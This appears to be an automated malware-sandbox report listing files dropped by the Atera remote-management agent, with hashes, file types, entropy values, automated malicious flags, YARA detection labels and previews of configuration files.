                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:0+vxmNWnRW5TPMNyby2sE9jBF6IYiYF85S35IVnxGUHF8C8nS1k:JSWnRWJ0Nyb8E9VF6IYijSJIVxI+2
                                                                                                                                                                                                                                                                                                                                  MD5:38CEF0491433ECC2C4A44F7CB1938699
                                                                                                                                                                                                                                                                                                                                  SHA1:9AD5A0C62CB7B12EA743314AFB20094F36A3BED3
                                                                                                                                                                                                                                                                                                                                  SHA-256:6965333694A42240FE7409863C7C38DAAE420C69C7BBC7D6B68D099C421A2087
                                                                                                                                                                                                                                                                                                                                  SHA-512:38E9BC2DC123009C2E49BE6DCFF4C46184ACD035184A1A1E726F766EDDCAEE337F63CC3002C876AF10D4E743A6B30A352D9ED0E749908CBD93E7C34CABD2F09B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):92712
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.483789197688696
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:i2Ec05j4eAH64rh5fSt5T9nFcI94WYG769:RlK4eA7mDmWYGq
                                                                                                                                                                                                                                                                                                                                  MD5:750028196E9FF29D537CF54A2BFB1F9A
                                                                                                                                                                                                                                                                                                                                  SHA1:DE353C00D535075B69A25CE8D37D7F71728D3CA3
                                                                                                                                                                                                                                                                                                                                  SHA-256:A74072F8AC542FE0980BD9471E9CB63CAE905408D3F3DA6A400490BAEA3502F7
                                                                                                                                                                                                                                                                                                                                  SHA-512:1F96F820D9CE957B1B1BB96AF065E2B18DE6ABD8E5811ACEE85D8E5ED573C371A6478DE5E8F6E6EF6BFE187539D6C59DA5020D208A614F9FD23810DA5F23E421
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\netstandard.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):3024177
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.999932863466441
                                                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:Qa/1hoqZnOG5FD1tE2DG2i8gXH0Jo3yYgJT/cyoK/OB0vr56vgFuIzyqY:n1jZOGZjDc5UZN/5D5fW
                                                                                                                                                                                                                                                                                                                                  MD5:57D8984A7BAE70C6FF3F85F71655241A
                                                                                                                                                                                                                                                                                                                                  SHA1:D747283E7621632A0E70C2926C315E6E5141A6BE
                                                                                                                                                                                                                                                                                                                                  SHA-256:A124B14F13DCEA8E25A9B7D9350E0B5527006E921F0C32FF922826F6564B170B
                                                                                                                                                                                                                                                                                                                                  SHA-512:67C468168F5A9782184E2A7CD0EBBC54B9FC4FDF2F72CCE51C3D03D5B46D4D8C2C8B54E9F74C3EF4A3F2CD53EE9F51DBB9CFF100ED4D9A19334888AB6C411788
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):56872
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.185826483139663
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:hhNALo0bJCDMpSSbxvqtJxm7BltW76JUk:LNA80bJDpSAvYxsrtWCL
                                                                                                                                                                                                                                                                                                                                  MD5:715CA834B9645C0E8A37AC29F89E4C56
                                                                                                                                                                                                                                                                                                                                  SHA1:29F696945CDE25500B4F0C9767AFAE75231EB137
                                                                                                                                                                                                                                                                                                                                  SHA-256:B9A24B5A8D6E2CDB3B5FD5E22B415B42246E7ABA4E82EB193345E98128F9817A
                                                                                                                                                                                                                                                                                                                                  SHA-512:6BC37B78FAD4362967CC04FAD91DDBDC861185FBF1EAFDD580D44140BE6C045CBF07805F788516C331C1EB1AFC54C24B8DAB59F60366284353C5F819E2F8F7BF
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1251
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.000868036244702
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:JdszvPF7N8OH2//3dVhOXrRH2/dV0PH2/+w3VUrPH2/+789y:3sB7iOgl27Rgdsg+w3Sg+78w
                                                                                                                                                                                                                                                                                                                                  MD5:16D1DF732FB7C3FE51EE9657C5AC458C
                                                                                                                                                                                                                                                                                                                                  SHA1:32CECF6AA8A03E11A967D54C67F9404F6A73D57B
                                                                                                                                                                                                                                                                                                                                  SHA-256:4FC493DA952DF0968311A06FAC3A5D03FBC2351DB77D0D907A1FAFA4ADA08777
                                                                                                                                                                                                                                                                                                                                  SHA-512:1F33ADA48F1ECAFA9238B87A8743C0A92953D123A917E38EC9F7EA7B92A7514AF6F244E4E3F77141D9ABDC11D120641FBDE9318525E0C3F2DC16F6E1D91634C9
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>... <supportedRuntime version="v4.0" />... <supportedRuntime version="v2.0.50727" />...</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="log4net" publicKeyToken="669e0ddf0bb1aa2a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.0.12.0" newVersion="2.0.12.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-4.0.3.0" newVersion="4.0.3.0" />.. </dependentAssembly>.. <dependentAssembly>.. <asse
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):12
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.584962500721156
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:WhXQp:WBC
                                                                                                                                                                                                                                                                                                                                  MD5:39B44CA42C8612A5930265AEB5B57D01
                                                                                                                                                                                                                                                                                                                                  SHA1:BCDB0725DAC93FF166F3720FB857044B34D30915
                                                                                                                                                                                                                                                                                                                                  SHA-256:88BA4BC3ED257A32C86D2300EF9BB15B5737E94530BA27A806CBF5240302E64B
                                                                                                                                                                                                                                                                                                                                  SHA-512:8EB7DF51281CDA144DC77175CB2BDE02294184DE60DB93C80A166ACF37E64C3508DFC0F82EC1511AA2D5A72828B2E7F78D6CCEE0015924FC15DF52ABE4F1268A
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:version=25.8
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):112168
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.178587216194047
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:6gs5os2RUW33uzNrscqSofyqwshFDfuX73QbQgLb/xs8bRUi+kEWWdK76tUgX:60jjnl1wuDYjQbQgLbZs8DWdKuX
                                                                                                                                                                                                                                                                                                                                  MD5:2781AF2E1F4E70A05CC118BC18B3388A
                                                                                                                                                                                                                                                                                                                                  SHA1:5CF9B71C28883F932DDD2B3AAF23CAFC8F544536
                                                                                                                                                                                                                                                                                                                                  SHA-256:8C06899571D38EDFA137DA4950CD5D9F92DF644D41D54F954426C81E3A1C697E
                                                                                                                                                                                                                                                                                                                                  SHA-512:5D52F1C4C57E27618D2373B000BA937BBFBE888FBDB77104DCD03A685DB18A71759BF401A69BCC17E30B32AE8CDE8D467906198E1BFB284AC7E02BE577311803
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):38952
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.310571609415621
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:dINsi1A6I1MLzHS0+iFJBn5gpKNEpYi60wgH:iNsii6v/HS0+OJd5gpKm76tgH
                                                                                                                                                                                                                                                                                                                                  MD5:9EFB4222ED0F71C28ACCBC0D1635D1E5
                                                                                                                                                                                                                                                                                                                                  SHA1:7F3E6B5B2F481D079555CB4C4005BB58162E3975
                                                                                                                                                                                                                                                                                                                                  SHA-256:A78B46794FC620E61535974486A0A24FF169AD75B4963F7317D1F5B54D9FCEAA
                                                                                                                                                                                                                                                                                                                                  SHA-512:E9780F8F2FEF264BEA1F8A93870CA35AA8445F6929E391CC95BCF7F61721821CB212326FF26E246B374CF707A24820837022523209F2162F24E862D2BDCCA051
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):398888
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.134305073798656
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:LjS6t1sm5LldNolZIkImcTi077Keb0wi0Lcr4so8mysKTqRjMnM6/Zmvz:L+e55LgIkTmyAAfTnMLvz
                                                                                                                                                                                                                                                                                                                                  MD5:42FD637BC457220FE392AF88603D0ED1
                                                                                                                                                                                                                                                                                                                                  SHA1:271516FBD1CC1D9A216A669BECBC72538EB21BF8
                                                                                                                                                                                                                                                                                                                                  SHA-256:1486814EC3AE714E4ACFC0FCEAE29EAFA6F34D28B7936F626EBBCA0B9F4A82B2
                                                                                                                                                                                                                                                                                                                                  SHA-512:33C59963EA07A5B044D40F51267F6D3D9B174FD0C219D4DF2772F13BD9D02C5E7A0B7C41C625E029B2A9ECDEB00F301C014191AB7CBBDF15388F99D7D06E9316
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):710184
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.960604982501175
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:fBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTU0:fBjk38WuBcAbwoA/BkjSHXP36RMG1
                                                                                                                                                                                                                                                                                                                                  MD5:AEB15458E8DD9B49A70948FAED4B28D2
                                                                                                                                                                                                                                                                                                                                  SHA1:037380D2681C999D116B3D5B1CB6C40988C485A9
                                                                                                                                                                                                                                                                                                                                  SHA-256:D97E279AFA23F8AFB30E2A1E1F062262D24D511A0877D967EFF0CF4048F3E7DF
                                                                                                                                                                                                                                                                                                                                  SHA-512:A544812441F0D2223234B22E9F9FE8EF5C502EADC068A617F5D3D2181D50EEA76ACBA9EB403E5975403641AEE55E78147F5BF8FBB37683C8461060BE48DB61A6
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):22056
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.675413837487963
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:Yy/fjFwUI/KQyVvKdDhG6ISDFWvYW8af0Nyb8E9VF6IYijSJIVxOqxKk:YuhMaVmzDC6k0EpYi60J
                                                                                                                                                                                                                                                                                                                                  MD5:5F5E6BFD8C5D22FCA5C8D996D3B885EB
                                                                                                                                                                                                                                                                                                                                  SHA1:0E7B9ED7931ADAF9551DEEDD8E009972ADD32B0D
                                                                                                                                                                                                                                                                                                                                  SHA-256:726E842DD5178AF1AC1AA456681661EB81575C82B37CB7EF3DA6E96DFC707E08
                                                                                                                                                                                                                                                                                                                                  SHA-512:3C88C5E0F73B3E3B1D76E6D67B3A03DE72D64DAC729D7C9C9E4F6C187709F6A1628013D5576D2C91D288392A1EFCD79D3CD1A53DCEE105421DF892AAD8902167
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):64040
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.265910858042768
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:BYDFPV3uv9niVSmzPFX8lpJ6TJPe4TW9Lvu2perEuaRtIvqUl1FHEpYi607zP:BKC9niwOepJ6TJPeb6NIUFg76KzP
                                                                                                                                                                                                                                                                                                                                  MD5:3CB271DCED141AF67EF7D4925BFE657D
                                                                                                                                                                                                                                                                                                                                  SHA1:D12761C0521C44C2C0E565AFBD5C60E0C78C7876
                                                                                                                                                                                                                                                                                                                                  SHA-256:31A9F2F565B84B1028EEE6655761DE6EDADB35D084AEF73BBBD9DF1AA3463B24
                                                                                                                                                                                                                                                                                                                                  SHA-512:168E5533B45F2E899B0236A8590B16A5279B4124A020030DE4850DB79D2FD51E3473657B113DF3FEE57F4CF125742BEC9F04AE57A57E8EB29024F9B3A2B7D98B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):138280
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.179057055473837
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:IP3XFz0qjCIIMAxlUXsKovHO420kN1A6C8IJHM:Ih0qjC5RMOHO420kN13
                                                                                                                                                                                                                                                                                                                                  MD5:EAE45B15608A6BFF934689C6B24E47A5
                                                                                                                                                                                                                                                                                                                                  SHA1:C25B0A3DC41D387CE4B36B6619306B7990F8BCC5
                                                                                                                                                                                                                                                                                                                                  SHA-256:316D95C2EB148DB0202DD81F8FBEFCAF6E583AFC789CF41086CB5465CF95F101
                                                                                                                                                                                                                                                                                                                                  SHA-512:D9939B61B5905F849A370B6846DF14F73E6CECFB602717C104062D039BA1684C90F4AA03AFA0AA04F2B37A9DC50BB8A60FD7FE68EFBEE12E0D30B0C1E91F86C9
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):17960
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.63536668056012
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:VTO9dQWXYW8a6gNyb8E9VF6IYijSJIVxJF08gWnV:VCn6xYEpYi60k8PnV
                                                                                                                                                                                                                                                                                                                                  MD5:B94C85819848AD1B453E83ED11448BFC
                                                                                                                                                                                                                                                                                                                                  SHA1:B24BE8B156D35A0ACD199113368748452E58EF4C
                                                                                                                                                                                                                                                                                                                                  SHA-256:70B8C93841BF6D119BBC3E5590F78DB9768554C484EF1C9C8AC9F415B2628B76
                                                                                                                                                                                                                                                                                                                                  SHA-512:D08312C94850A275B40D38BE1B0ECE20A6183984A90304D2F1625AD1536560154447224681747DDED3C639E1F5CE5BDCCED59E7B83F5DFB8A0FFBD251BF61272
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):50216
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.218337642595647
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:1SrEZvG2rO1/ovmVLmAY23MrQ56gJkBnCqb2l/EpYi60keCCc:IsG2KBVLFOONiBnul476Lz/
                                                                                                                                                                                                                                                                                                                                  MD5:DB42B87D0A40AF0639FE13D99D790007
                                                                                                                                                                                                                                                                                                                                  SHA1:C42D6A225FD3411C1DA084E3EAC71F0D2ED94250
                                                                                                                                                                                                                                                                                                                                  SHA-256:041697BD0D0C0D468A532F76840773372FC725A3B33DA331FE3436CD67FEAAD7
                                                                                                                                                                                                                                                                                                                                  SHA-512:F6271DBCD41D981F3CA00E303589A7791F140C3543A107E7A13181D028006998202A78D2A62F4608F49BA7B558BBF70E8F120CEECD0B74347181AB26C9B4BC3B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1140
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.958392223272386
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:JduPF7N8OH2//3dVhOXrRH2/dV0PH2/+w3VUrPH2/+789y:327iOgl27Rgdsg+w3Sg+78w
                                                                                                                                                                                                                                                                                                                                  MD5:082A70376537A2E9B0BD9DFAD8D2496D
                                                                                                                                                                                                                                                                                                                                  SHA1:1B4A667CFB09D050614149D6FD8A283071DC890A
                                                                                                                                                                                                                                                                                                                                  SHA-256:50934981FA1B0066B22261984941887740838459B5CFA06846BA15F39B4D10F9
                                                                                                                                                                                                                                                                                                                                  SHA-512:763212C74B6AB727C6E2C19CA2CDFC547B357BD5E1E5C196A3A2598DCEB316D3C8E8554A7EDD1AFA99FD38E1153EDC383631D2755BB31E70236084CF27C49875
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
Preview:
<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <runtime>
    <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
      <dependentAssembly>
        <assemblyIdentity name="log4net" publicKeyToken="669e0ddf0bb1aa2a" culture="neutral" />
        <bindingRedirect oldVersion="0.0.0.0-2.0.12.0" newVersion="2.0.12.0" />
      </dependentAssembly>
      <dependentAssembly>
        <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />
        <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />
      </dependentAssembly>
      <dependentAssembly>
        <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />
        <bindingRedirect oldVersion="0.0.0.0-4.0.3.0" newVersion="4.0.3.0" />
      </dependentAssembly>
      <dependentAssembly>
        <assemblyIdentity name="System.Memory" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />
        <bindingRedir
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):6655016
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.267125888465353
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:98304:rCMEM0MUMRMxMwMkfqbjxbSzGVr4W11ByHY4W6upIj8:7lV1qKpkfqbjeGVr4NHYJ60i8
                                                                                                                                                                                                                                                                                                                                  MD5:5BABC7C01BEF07EA5BACDB9881231064
                                                                                                                                                                                                                                                                                                                                  SHA1:2581FB7A659141C15052E81F0199C9951715B62A
                                                                                                                                                                                                                                                                                                                                  SHA-256:5950346400FB10851DA2489B1AA4F6A2EDA88030237D520E9F490621A9EAA9EE
                                                                                                                                                                                                                                                                                                                                  SHA-512:23F9EA52B09CA6BB592085D15B5243CAD6F9C7B696FEDF3AE213E337C258A0B9F2C114BF2D0B5BF16009EC2E07D24D7020D457AA117A4875C1E7460E8C64FA9C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\chocolatey.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):280616
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.691121487326214
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:RG0WgexKpGi8PnJcerXUaxX3HVeES4BEIqTTpX/4ormGpnaVTSGCkMhkEn7GAhCk:RJrycoB3HVeESME3pnaVTS1nh7hCah
                                                                                                                                                                                                                                                                                                                                  MD5:3592D37445F2C5F67E4846F57AE7CBCE
                                                                                                                                                                                                                                                                                                                                  SHA1:81B9D934E377901AB447A74855D8878932D3947F
                                                                                                                                                                                                                                                                                                                                  SHA-256:AE5B26239CDE7152DB522EC25E1E2BFBCBD9289187CE4CB92980BF0D6438001E
                                                                                                                                                                                                                                                                                                                                  SHA-512:1ED9B41F4F4E0006F1E9A6FC9DDA67223E127869136338DFB2C0D102958F5E15CE76079485F8FE9AED4870A128FB6BA9759FF152FFE0961770E891F39182BA58
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1185456
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.999660178690134
                                                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:Ssoja9MaLduouhVlf0tyv29r1+IdjkaCgs54gvUokF4fEFBb:HoFOJuhV+tyor1+I+aqdM2MFBb
                                                                                                                                                                                                                                                                                                                                  MD5:6C6F85E896655A6EB726482F04C49086
                                                                                                                                                                                                                                                                                                                                  SHA1:2E0C55CD4894117428B34D21A1D53738FCE4B02C
                                                                                                                                                                                                                                                                                                                                  SHA-256:E109400A93FEDE90201BBF37C1868C789888BCE9D03A4AE5B46C48599939C34E
                                                                                                                                                                                                                                                                                                                                  SHA-512:B58303C149DEFFC9E374D5BA42A8A73B7CE890D35F9589FE0B09ACEC541A21D589D49FA5086B965277FA22DFE308357505124F13A6FF1E0DE415EBC40CE61E15
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):55344
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.139210251385105
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:N2Xj3YqBmARWhNqjxcVqnOvdBsqW/BCiFl0scb/MV7Hx/:wX5BqSBjb0tb/MVJ
                                                                                                                                                                                                                                                                                                                                  MD5:77C613FFADF1F4B2F50D31EEEC83AF30
                                                                                                                                                                                                                                                                                                                                  SHA1:76A6BFD488E73630632CC7BD0C9F51D5D0B71B4C
                                                                                                                                                                                                                                                                                                                                  SHA-256:2A0EAD6E9F424CBC26EF8A27C1EED1A3D0E2DF6419E7F5F10AA787377A28D7CF
